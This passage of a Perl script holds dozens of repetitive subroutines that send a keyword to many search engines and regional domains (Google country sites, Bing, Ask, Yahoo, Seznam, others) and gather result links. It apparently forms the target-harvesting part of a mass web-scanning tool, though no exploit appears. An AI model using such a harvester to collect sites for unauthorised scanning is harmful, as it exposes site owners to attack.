$res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleye/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googlecu() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.cu/search?q=".uri_escape($key)."&hl=&cr=countryCU&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googlecu/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googleto() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.to/search?q=".uri_escape($key)."&hl=&cr=countryTO&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleto/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googletz() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.tz/search?q=".uri_escape($key)."&hl=&cr=countryTZ&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googletz/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googlers() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.rs/search?q=".uri_escape($key)."&hl=&cr=countryRS&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googlers/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googlepm() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.pm/search?q=".uri_escape($key)."&hl=&cr=countryPM&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googlepm/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googlelt() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.lt/search?q=".uri_escape($key)."&hl=&cr=countryLT&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googlelt/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googlemz() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.mz/search?q=".uri_escape($key)."&hl=&cr=countrymz&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googlemz/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googlema() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.ma/search?q=".uri_escape($key)."&hl=&cr=countryMA&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googlema/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googleal() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.al/search?q=".uri_escape($key)."&hl=&cr=countryAL&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleal/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googleec() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.ec/search?q=".uri_escape($key)."&hl=&cr=countryEC&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleec/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googlekg() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.kg/search?q=".uri_escape($key)."&hl=&cr=countryKG&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googlekg/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googleuz() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.uz/search?q=".uri_escape($key)."&hl=&cr=countryUZ&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleuz/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googlesv() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.sv/search?q=".uri_escape($key)."&hl=&cr=countrySV&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googlesv/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub walla() { my @list; my $key = $_[0]; for ($b=0; $b<=100; $b+=1) { my $search = ("http://search.walla.co.il/?q=".uri_escape($key)."&type=text&page=".$b); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"http:\/\/(.+?)\" title=/g) { my $link = $1; if ($link !~ /walla\.co\.il/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub yahoo(){ my @list; my $key = $_[0]; for ($b=1; $b<=1000; $b+=10) { my $search = ("http://search.yahoo.com/search?p=".uri_escape($key)."&b=".$b); my $res = &search_engine_query($search); while ($res =~ m/http\%3a\/\/(.+?)\"/g) { my $link = $1; if ($link !~ /yahoo\.com/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub ask() { my @list; my $key = $_[0]; for (my $i=1; $i<=1000; $i+=100) { my $search = ("http://uk.ask.com/web?q=".uri_escape($key)."&qsrc=1&frstpgo=0&o=0&l=dir&qid=05D10861868F8C7817DAE9A6B4D30795&page=".$i."&jss="); my $res = &search_engine_query($search); while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) { my $link = $1; if ($link !~ /ask\.com/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub onet() { my @list; my $key = $_[0]; my $b = 0; for ($b=1; $b<=400; $b+=10) { my $search = ("http://szukaj.onet.pl/".$b.",query.html?qt=".uri_escape($key)); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"http:\/\/(.*?)\">/g) { my $link = $1; if ($link !~ /onet|webcache|query/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub clusty() { my @list; my $key = $_[0]; my $b = 0; for ($b=10; $b<=200; $b+=10) { my $search = ("http://search.yippy.com/search?input-form=clusty-simple&v%3Asources=webplus-ns-aaf&v%3Aproject=clusty&query=".uri_escape($key)."&v:state=root|root-".$b."-20|0&"); my $res = &search_engine_query($search); if ($res !~ /next/) {$b=100;} while ($res =~ m/<a href=\"http:\/\/(.*?)\"/g) { my $link = $1; if ($1 !~ /yippy\.com/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub bing() { my @list; my $key = $_[0]; for (my $i=1; $i<=400; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&first=".$i); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /google/) { my @grep = &links($link); push(@list,@grep); } } } return @list; } sub sapo(){ my @list; my $key = $_[0]; for ($b=1; $b<=50; $b+=1) { my $search = ("http://pesquisa.sapo.pt/?barra=resumo&cluster=0&format=html&limit=10&location=pt&page=".$b."&q=".uri_escape($key)."&st=local"); my $res = &search_engine_query($search); if ($res !~ m/Next/i) {$b=50;} while ($res =~ m/<a href=\"http:\/\/(.*?)\"/g) { my $link = $1; if ($1 !~ /\.sapo\.pt/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub lycos() { my @list; my $key = $_[0]; for ($b=0; $b<=50; $b+=1) { my $search = ("http://search.lycos.com/web?q=".uri_escape($key)."&pn=".$b); my $res = &search_engine_query($search); while ($res =~ m/title=\"http:\/\/(.*?)\"/g) { my $link = $1; if ($link !~ /lycos\.com/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub uol() { my @list; my $key = $_[0]; for ($b=0; $b<=1000; $b+=10) { my $search = ("http://busca.uol.com.br/web/?ref=homeuol&q=".uri_escape($key)."&start=".$b); my $res = &search_engine_query($search); if ($res =~ m/retornou nenhum resultado/i) {$b=500;} while ($res =~ m/href=\"?http:\/\/([^\">]*)\"/g) { my $link = $1; if ($link !~ /uol\.com\.br|\/web/i){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub seznam() { my @list; my $key = $_[0]; for ($b=1; $b<=300; $b+=20) { my $search = ("http://search.seznam.cz/?q=".uri_escape($key)."&count=20&from=".$b); my $res = &search_engine_query($search); while ($res =~ m/href=\"?http:\/\/([^\">]*)\"/g) { my $link = $1; if ($link !~ /seznam\.cz|chytrevyhledavani\.cz|smobil\.cz|sklik\.cz/i){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub hotbot() { my @list; my $key = $_[0]; for ($b=0; $b<=50; $b+=1) { my $search = ("http://www.hotbot.com/search/web?pn=".$b."&q=".uri_escape($key)); my $res = &search_engine_query($search); if ($res =~ m/had no web result/i) {$b=50;} while ($res =~ m/href=\"http:\/\/(.+?)\" title=/g) { my $link = $1; if ($link !~ /hotbot\.com/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub aol() { my @list; my $key = $_[0]; for ($b=0; $b<=300; $b+=10) { my $search = ("http://search.aol.com/aol/search?q=".uri_escape($key)."&page=".$b); my $res = &search_engine_query($search); while ($res =~ m/href=\"http:\/\/(.*?)\"/g) { my $link = $1; if ($link !~ /aol\.com/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub biglobe { my $key = $_[0]; my @list; for ($b=1; $b<=500; $b+=10) { $num += $num; my $search = "http://cgi.search.biglobe.ne.jp/cgi-bin/search-st_lp2?start=".$b."&ie=utf8&num=".$num."&q=".uri_escape($key)."&lr=all"; my $res = &search_engine_query($search); while ( $res =~ m/<a href=\"http:\/\/(.+?)\"/g ) { my $link = $1; if ($link !~ /biglobe/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub yahoo2() { my @list; my $key = $_[0]; my $b = 0; my @doms = ("nl","au","br","ca","de","es","fr","it","uk"); foreach my $domain (@doms) { for (my $i=1; $i<=1000; $i+=100) { my $search = ("http://".$domain.".search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i); my $res = &search_engine_query($search); while ($res =~ m/http\%3a\/\/(.+?)\//g) { if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); } } } } return @list; } sub kvasir() { my @list; my $key = $_[0]; for (my $i=10; $i<=1000; $i+=100){ my $search = ("http://www.kvasir.no/nettsok?q=".$i."&pageSize=100&q=".uri_escape($key).""); my $res = &search_engine_query($search); while ($res =~ m/href=\"http:\/\/(.+?)\//g) { my $link = $1; if ($link !~ /kvasir/){ $link =~ s/<//g; $link =~ s/ //g; my @grep = links($link); push(@list,@grep); } } } return @list; } sub quint() { my @lst; my $key = $_[0]; for (my $i=0; $i<=50; $i+=1){ my $search = ("http://quintura.com/?request=".uri_escape($key)."&tab=0&page=".$i."&tabid="); my $res = search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/(.+?)\//g) { my $link = $1; if ($link !~ /quintura/){ my @grep = links($link); push(@lst,@grep); } } } return @lst; } sub seznam() { my @list; my $key = $_[0]; for ($b=1; $b<=1000; $b+=100) { my $search = ("http://search.seznam.cz/?q=".uri_escape($key)."&count=10&pId=SkYLl2GXwV0CZZUQcglt&from=".$b); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"http:\/\/(.+?)\" title/g) { if ($1 !~ /seznam/){ my $link = $1; my @grep = &links($link); push(@list,@grep); } } } return @list; } sub pagina(){ my @list; my $key = $_[0]; my $i = 0; for ($i=0; $i<=100; $i+=1){ my $web=("http://startgoogle.startpagina.nl/index.php?q=".uri_escape($key)."&start=".$i."&origin=homepage&source=geentaal"); my $Res= search_engine_query($web); while ($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){ if ($1 !~ /pagina|pagina's/){ my $k=$1; my @grep=links($k); push(@list,@grep); } } } return @list; } sub clix(){ my @list; my $key = $_[0]; for($b=1;$b<=1000;$b+=100){ my $Th=("http://www.google.pt/search?q=".uri_escape($key)."&in=Mundial&num=25&ckWhere=Mundo&position=".$b.""); my $Res=&search_engine_query($Th); while($Res =~ m/href=\"http:\/\/(.+?)\//g){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep); } } return @list; } sub ask2() { my @list; my $key = $_[0]; for (my $i=1; $i<=50; $i+=1) { my $search = ("http://it.ask.com/web?q=".uri_escape($key)."&qsrc=0&o=0&l=dir&qid=EE90DE6E8F5370F363A63EC61228D4FE&page=".$i."&jss=1&dm=all"); my $res = &search_engine_query($search); if ($res !~ /Successiva/) {$i=50;} while ($res =~ m/href=\"http:\/\/(.+?)\" onmousedown=\"/g) { if ($1 !~ /ask\.com/){ my $link = $1; my @grep = &links($link); push(@list,@grep); } } } return @list; } sub askCA() { my @list; my $key = $_[0]; for (my $i=1; $i<=100; $i+=1) { my $search = ("http://ca.ask.com/web?q=".uri_escape($key)."&qsrc=0&frstpgo=0&o=0&l=dir&qid=BC8234276535BC11853E5F40B17E3B01&page=".$i."&jss=1"); my $res = &search_engine_query($search); while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) { my $link = $1; if ($link !~ /askCA\.com/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sleep(1); sub askDE() { my @list; my $key = $_[0]; for (my $i=1; $i<=100; $i+=1) { my $search = ("http://de.ask.com/web?q=".uri_escape($key)."&qsrc=0&frstpgo=0&o=0&l=dir&qid=BC8234276535BC11853E5F40B17E3B01&page=".$i."&jss=1"); my $res = &search_engine_query($search); while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) { my $link = $1; if ($link !~ /askDE\.com/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub askIT() { my @list; my $key = $_[0]; for (my $i=1; $i<=100; $i+=1) { my $search = ("http://it.ask.com/web?q=".uri_escape($key)."&qsrc=0&frstpgo=0&o=0&l=dir&qid=BC8234276535BC11853E5F40B17E3B01&page=".$i."&jss=1"); my $res = &search_engine_query($search); while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) { my $link = $1; if ($link !~ /askIT\.com/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub askUK() { my @list; my $key = $_[0]; for (my $i=1; $i<=100; $i+=1) { my $search = ("http://uk.ask.com/web?q=".uri_escape($key)."&qsrc=0&frstpgo=0&o=0&l=dir&qid=BC8234276535BC11853E5F40B17E3B01&page=".$i."&jss=1"); my $res = &search_engine_query($search); while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) { my $link = $1; if ($link !~ /askUK\.com/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub askFR() { my @list; my $key = $_[0]; for (my $i=1; $i<=100; $i+=1) { my $search = ("http://fr.ask.com/web?q=".uri_escape($key)."&qsrc=0&frstpgo=0&o=0&l=dir&qid=BC8234276535BC11853E5F40B17E3B01&page=".$i."&jss=1"); my $res = &search_engine_query($search); while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) { my $link = $1; if ($link !~ /askFR\.com/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub askES() { my @list; my $key = $_[0]; for (my $i=1; $i<=100; $i+=1) { my $search = ("http://es.ask.com/web?q=".uri_escape($key)."&qsrc=0&frstpgo=0&o=0&l=dir&qid=BC8234276535BC11853E5F40B17E3B01&page=".$i."&jss=1"); my $res = &search_engine_query($search); while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) { my $link = $1; if ($link !~ /askES\.com/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub askRU() { my @list; my $key = $_[0]; for (my $i=1; $i<=100; $i+=1) { my $search = ("http://ru.ask.com/web?q=".uri_escape($key)."&qsrc=0&frstpgo=0&o=0&l=dir&qid=BC8234276535BC11853E5F40B17E3B01&page=".$i."&jss=1"); my $res = &search_engine_query($search); while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) { my $link = $1; if ($link !~ /askRU\.com/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sleep(1); sub askNL() { my @list; my $key = $_[0]; for (my $i=1; $i<=100; $i+=1) { my $search = ("http://nl.ask.com/web?q=".uri_escape($key)."&qsrc=0&frstpgo=0&o=0&l=dir&qid=BC8234276535BC11853E5F40B17E3B01&page=".$i."&jss=1"); my $res = &search_engine_query($search); while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) { my $link = $1; if ($link !~ /askNL\.com/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub askPL() { my @list; my $key = $_[0]; for (my $i=1; $i<=100; $i+=1) { my $search = ("http://pl.ask.com/web?q=".uri_escape($key)."&qsrc=0&frstpgo=0&o=0&l=dir&qid=BC8234276535BC11853E5F40B17E3B01&page=".$i."&jss=1"); my $res = &search_engine_query($search); while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) { my $link = $1; if ($link !~ /askPL\.com/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub askAT() { my @list; my $key = $_[0]; for (my $i=1; $i<=100; $i+=1) { my $search = ("http://at.ask.com/web?q=".uri_escape($key)."&qsrc=0&frstpgo=0&o=0&l=dir&qid=BC8234276535BC11853E5F40B17E3B01&page=".$i."&jss=1"); my $res = &search_engine_query($search); while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) { my $link = $1; if ($link !~ /askAT\.com/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub askSE() { my @list; my $key = $_[0]; for (my $i=1; $i<=100; $i+=1) { my $search = ("http://se.ask.com/web?q=".uri_escape($key)."&qsrc=0&frstpgo=0&o=0&l=dir&qid=BC8234276535BC11853E5F40B17E3B01&page=".$i."&jss=1"); my $res = &search_engine_query($search); while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) { my $link = $1; if ($link !~ /askSE\.com/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub askDK() { my @list; my $key = $_[0]; for (my $i=1; $i<=100; $i+=1) { my $search = ("http://dk.ask.com/web?q=".uri_escape($key)."&qsrc=0&frstpgo=0&o=0&l=dir&qid=BC8234276535BC11853E5F40B17E3B01&page=".$i."&jss=1"); my $res = &search_engine_query($search); while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) { my $link = $1; if ($link !~ /askDK\.com/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub askNO() { my @list; my $key = $_[0]; for (my $i=1; $i<=100; $i+=1) { my $search = ("http://no.ask.com/web?q=".uri_escape($key)."&qsrc=0&frstpgo=0&o=0&l=dir&qid=BC8234276535BC11853E5F40B17E3B01&page=".$i."&jss=1"); my $res = &search_engine_query($search); while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) { my $link = $1; if ($link !~ /askNO\.com/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sleep(1); sub askAU() { my @list; my $key = $_[0]; for (my $i=1; $i<=100; $i+=1) { my $search = ("http://au.ask.com/web?q=".uri_escape($key)."&qsrc=0&frstpgo=0&o=0&l=dir&qid=BC8234276535BC11853E5F40B17E3B01&page=".$i."&jss=1"); my $res = &search_engine_query($search); while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) { my $link = $1; if ($link !~ /askAU\.com/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub askBR() { my @list; my $key = $_[0]; for (my $i=1; $i<=100; $i+=1) { my $search = ("http://br.ask.com/web?q=".uri_escape($key)."&qsrc=0&frstpgo=0&o=0&l=dir&qid=BC8234276535BC11853E5F40B17E3B01&page=".$i."&jss=1"); my $res = &search_engine_query($search); while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) { my $link = $1; if ($link !~ /askBR\.com/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub askMX() { my @list; my $key = $_[0]; for (my $i=1; $i<=100; $i+=1) { my $search = ("http://mx.ask.com/web?q=".uri_escape($key)."&qsrc=0&frstpgo=0&o=0&l=dir&qid=BC8234276535BC11853E5F40B17E3B01&page=".$i."&jss=1"); my $res = &search_engine_query($search); while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) { my $link = $1; if ($link !~ /askMX\.com/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sleep(1); sub askJP() { my @list; my $key = $_[0]; for (my $i=1; $i<=100; $i+=1) { my $search = ("http://jp.ask.com/web?q=".uri_escape($key)."&qsrc=0&frstpgo=0&o=0&l=dir&qid=BC8234276535BC11853E5F40B17E3B01&page=".$i."&jss=1"); my $res = &search_engine_query($search); while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) { my $link = $1; if ($link !~ /askJP\.com/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub onet() { my @list; my $key = $_[0]; my $b = 0; for ($b=1; $b<=400; $b+=10) { my $search = ("http://szukaj.onet.pl/".$b.",query.html?qt=".uri_escape($key)); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"http:\/\/(.*?)\">/g) { my $link = $1; if ($link !~ /onet|webcache|query/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub clusty() { my @list; my $key = $_[0]; my $b = 0; for ($b=10; $b<=200; $b+=10) { my $search = ("http://search.yippy.com/search?input-form=clusty-simple&v%3Asources=webplus-ns-aaf&v%3Aproject=clusty&query=".uri_escape($key)."&v:state=root|root-".$b."-20|0&"); my $res = &search_engine_query($search); if ($res !~ /next/) {$b=100;} while ($res =~ m/<a href=\"http:\/\/(.*?)\"/g) { my $link = $1; if ($1 !~ /yippy\.com/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub bing() { my @list; my $key = $_[0]; for (my $i=1; $i<=400; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&first=".$i); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /google/) { my @grep = &links($link); push(@list,@grep); } } } return @list; } sub bingDE() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=de&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingDE/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sleep(1); sub bingUK() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=uk&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingUK/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingCA() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=ca&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingCA/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingBR() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=br&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingBR/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingFR() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=fr&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingFR/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingES() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=es&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingES/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingIT() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=it&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingIT/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sleep(1); sub bingBE() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=be&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingBE/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingNL() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=nl&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingNL/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingPT() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=pt&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingPT/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingNO() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=no&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingNO/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingDK() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=dk&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingDK/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingSE() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=se&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingSE/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sleep(1); sub bingCH() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=ch&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingCH/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingNZ() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=nz&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingNZ/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingRU() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=ru&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingRU/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingJP() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = 